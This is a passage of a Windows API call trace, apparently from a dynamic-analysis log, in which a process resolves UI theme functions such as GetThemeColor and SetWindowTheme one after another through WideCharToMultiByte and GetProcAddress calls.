cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0287.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundContentRect", cchWideChar=29, lpMultiByteStr=0x9dfd2c, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeBackgroundContentRect", lpUsedDefaultChar=0x0) returned 29 [0287.370] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeBackgroundContentRect") returned 0x7444da9e [0287.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundExtent", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0287.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundExtent", cchWideChar=24, lpMultiByteStr=0x9dfd2c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeBackgroundExtent", lpUsedDefaultChar=0x0) returned 24 [0287.370] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeBackgroundExtent") returned 0x74457155 [0287.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemePartSize", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0287.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemePartSize", cchWideChar=16, lpMultiByteStr=0x9d88ac, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemePartSize", lpUsedDefaultChar=0x0) returned 16 [0287.370] GetProcAddress (hModule=0x74430000, lpProcName="GetThemePartSize") returned 0x7444289f [0287.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeTextExtent", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0287.370] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeTextExtent", cchWideChar=18, lpMultiByteStr=0x9d88ac, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeTextExtent", lpUsedDefaultChar=0x0) returned 18 [0287.371] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeTextExtent") returned 0x744489fe [0287.371] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeTextMetrics", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0287.371] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeTextMetrics", cchWideChar=19, lpMultiByteStr=0x9d88ac, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeTextMetrics", lpUsedDefaultChar=0x0) returned 19 [0287.371] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeTextMetrics") returned 0x7445778c [0287.371] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundRegion", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0287.371] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBackgroundRegion", cchWideChar=24, lpMultiByteStr=0x9dfd2c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeBackgroundRegion", lpUsedDefaultChar=0x0) returned 24 [0287.371] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeBackgroundRegion") returned 0x74450190 [0287.371] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="HitTestThemeBackground", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0287.371] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="HitTestThemeBackground", cchWideChar=22, lpMultiByteStr=0x9d88ac, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HitTestThemeBackground", lpUsedDefaultChar=0x0) returned 22 [0287.371] GetProcAddress (hModule=0x74430000, lpProcName="HitTestThemeBackground") returned 0x74452dc1 [0287.371] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeEdge", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0287.371] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeEdge", cchWideChar=13, lpMultiByteStr=0x9c390c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DrawThemeEdge", lpUsedDefaultChar=0x0) returned 13 [0287.371] GetProcAddress (hModule=0x74430000, lpProcName="DrawThemeEdge") returned 0x7446c01c [0287.371] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeIcon", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0287.371] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DrawThemeIcon", cchWideChar=13, lpMultiByteStr=0x9c390c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DrawThemeIcon", lpUsedDefaultChar=0x0) returned 13 [0287.371] GetProcAddress (hModule=0x74430000, lpProcName="DrawThemeIcon") returned 0x7446d123 [0287.371] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemePartDefined", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0287.371] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemePartDefined", cchWideChar=18, lpMultiByteStr=0x9d88ac, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsThemePartDefined", lpUsedDefaultChar=0x0) returned 18 [0287.372] GetProcAddress (hModule=0x74430000, lpProcName="IsThemePartDefined") returned 0x744430cf [0287.372] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeBackgroundPartiallyTransparent", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0287.372] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeBackgroundPartiallyTransparent", cchWideChar=37, lpMultiByteStr=0x9f54dc, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsThemeBackgroundPartiallyTransparent", lpUsedDefaultChar=0x0) returned 37 [0287.372] GetProcAddress (hModule=0x74430000, lpProcName="IsThemeBackgroundPartiallyTransparent") returned 0x7444281c [0287.372] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeColor", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0287.372] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeColor", cchWideChar=13, lpMultiByteStr=0x9c390c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeColor", lpUsedDefaultChar=0x0) returned 13 [0287.372] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeColor") returned 0x744427c0 [0287.372] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeMetric", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0287.372] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeMetric", cchWideChar=14, lpMultiByteStr=0x9c390c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeMetric", lpUsedDefaultChar=0x0) returned 14 [0287.372] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeMetric") returned 0x744555b4 [0287.372] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeString", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0287.372] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeString", cchWideChar=14, lpMultiByteStr=0x9c390c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeString", lpUsedDefaultChar=0x0) returned 14 [0287.372] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeString") returned 0x7446b7a1 [0287.372] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBool", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0287.372] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeBool", cchWideChar=12, lpMultiByteStr=0x9c390c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeBool", lpUsedDefaultChar=0x0) returned 12 [0287.372] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeBool") returned 0x74446651 [0287.372] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeInt", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0287.372] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeInt", cchWideChar=11, lpMultiByteStr=0x9c390c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeInt", lpUsedDefaultChar=0x0) returned 11 [0287.373] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeInt") returned 0x744427c0 [0287.373] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeEnumValue", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0287.373] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeEnumValue", cchWideChar=17, lpMultiByteStr=0x9d88ac, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeEnumValue", lpUsedDefaultChar=0x0) returned 17 [0287.373] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeEnumValue") returned 0x744427c0 [0287.373] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemePosition", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0287.373] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemePosition", cchWideChar=16, lpMultiByteStr=0x9d88ac, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemePosition", lpUsedDefaultChar=0x0) returned 16 [0287.373] GetProcAddress (hModule=0x74430000, lpProcName="GetThemePosition") returned 0x7446b80d [0287.373] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeFont", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0287.373] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeFont", cchWideChar=12, lpMultiByteStr=0x9c390c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeFont", lpUsedDefaultChar=0x0) returned 12 [0287.373] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeFont") returned 0x744576a2 [0287.373] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeRect", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0287.373] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeRect", cchWideChar=12, lpMultiByteStr=0x9c390c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeRect", lpUsedDefaultChar=0x0) returned 12 [0287.373] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeRect") returned 0x7446b936 [0287.373] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeMargins", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0287.373] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeMargins", cchWideChar=15, lpMultiByteStr=0x9c390c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeMargins", lpUsedDefaultChar=0x0) returned 15 [0287.374] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeMargins") returned 0x74442f97 [0287.374] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeIntList", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0287.374] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeIntList", cchWideChar=15, lpMultiByteStr=0x9c390c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeIntList", lpUsedDefaultChar=0x0) returned 15 [0287.374] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeIntList") returned 0x7446b86e [0287.374] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemePropertyOrigin", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0287.374] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemePropertyOrigin", cchWideChar=22, lpMultiByteStr=0x9d88ac, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemePropertyOrigin", lpUsedDefaultChar=0x0) returned 22 [0287.374] GetProcAddress (hModule=0x74430000, lpProcName="GetThemePropertyOrigin") returned 0x74450923 [0287.374] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetWindowTheme", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0287.374] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetWindowTheme", cchWideChar=14, lpMultiByteStr=0x9c390c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetWindowTheme", lpUsedDefaultChar=0x0) returned 14 [0287.374] GetProcAddress (hModule=0x74430000, lpProcName="SetWindowTheme") returned 0x74457afc [0287.374] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeFilename", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0287.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeFilename", cchWideChar=16, lpMultiByteStr=0x9d88ac, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeFilename", lpUsedDefaultChar=0x0) returned 16 [0287.375] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeFilename") returned 0x7446b997 [0287.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysColor", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0287.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysColor", cchWideChar=16, lpMultiByteStr=0x9d88ac, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysColor", lpUsedDefaultChar=0x0) returned 16 [0287.375] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeSysColor") returned 0x74455530 [0287.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysColorBrush", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0287.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysColorBrush", cchWideChar=21, lpMultiByteStr=0x9d88ac, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysColorBrush", lpUsedDefaultChar=0x0) returned 21 [0287.375] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeSysColorBrush") returned 0x7446ca32 [0287.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysBool", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0287.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysBool", cchWideChar=15, lpMultiByteStr=0x9c390c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysBool", lpUsedDefaultChar=0x0) returned 15 [0287.375] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeSysBool") returned 0x7446cb86 [0287.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysSize", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0287.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysSize", cchWideChar=15, lpMultiByteStr=0x9c390c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysSize", lpUsedDefaultChar=0x0) returned 15 [0287.375] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeSysSize") returned 0x7446cc61 [0287.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysFont", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0287.375] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysFont", cchWideChar=15, lpMultiByteStr=0x9c390c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysFont", lpUsedDefaultChar=0x0) returned 15 [0287.375] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeSysFont") returned 0x7446c3d8 [0287.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysString", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0287.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysString", cchWideChar=17, lpMultiByteStr=0x9d88ac, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysString", lpUsedDefaultChar=0x0) returned 17 [0287.376] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeSysString") returned 0x7446c553 [0287.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysInt", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0287.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeSysInt", cchWideChar=14, lpMultiByteStr=0x9c390c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeSysInt", lpUsedDefaultChar=0x0) returned 14 [0287.376] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeSysInt") returned 0x7446c5e7 [0287.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeActive", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0287.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeActive", cchWideChar=13, lpMultiByteStr=0x9c390c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsThemeActive", lpUsedDefaultChar=0x0) returned 13 [0287.376] GetProcAddress (hModule=0x74430000, lpProcName="IsThemeActive") returned 0x74456f36 [0287.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsAppThemed", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0287.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsAppThemed", cchWideChar=11, lpMultiByteStr=0x9c390c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsAppThemed", lpUsedDefaultChar=0x0) returned 11 [0287.376] GetProcAddress (hModule=0x74430000, lpProcName="IsAppThemed") returned 0x74457009 [0287.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetWindowTheme", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0287.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetWindowTheme", cchWideChar=14, lpMultiByteStr=0x9c390c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetWindowTheme", lpUsedDefaultChar=0x0) returned 14 [0287.376] GetProcAddress (hModule=0x74430000, lpProcName="GetWindowTheme") returned 0x7445535b [0287.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnableThemeDialogTexture", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0287.376] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="EnableThemeDialogTexture", cchWideChar=24, lpMultiByteStr=0x9dfd2c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EnableThemeDialogTexture", lpUsedDefaultChar=0x0) returned 24 [0287.377] GetProcAddress (hModule=0x74430000, lpProcName="EnableThemeDialogTexture") returned 0x7445786d [0287.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeDialogTextureEnabled", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0287.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IsThemeDialogTextureEnabled", cchWideChar=27, lpMultiByteStr=0x9dfd2c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsThemeDialogTextureEnabled", lpUsedDefaultChar=0x0) returned 27 [0287.377] GetProcAddress (hModule=0x74430000, lpProcName="IsThemeDialogTextureEnabled") returned 0x7446cb3f [0287.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeAppProperties", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0287.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetThemeAppProperties", cchWideChar=21, lpMultiByteStr=0x9d88ac, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetThemeAppProperties", lpUsedDefaultChar=0x0) returned 21 [0287.377] GetProcAddress (hModule=0x74430000, lpProcName="GetThemeAppProperties") returned 0x7444ebd6 [0287.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetThemeAppProperties", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0287.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetThemeAppProperties", cchWideChar=21, lpMultiByteStr=0x9d88ac, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetThemeAppProperties", lpUsedDefaultChar=0x0) returned 21 [0287.377] GetProcAddress (hModule=0x74430000, lpProcName="SetThemeAppProperties") returned 0x7446ccec [0287.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetCurrentThemeName", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0287.377] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetCurrentThemeName", cchWideChar=19, lpMultiByteStr=0x9d88ac, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | 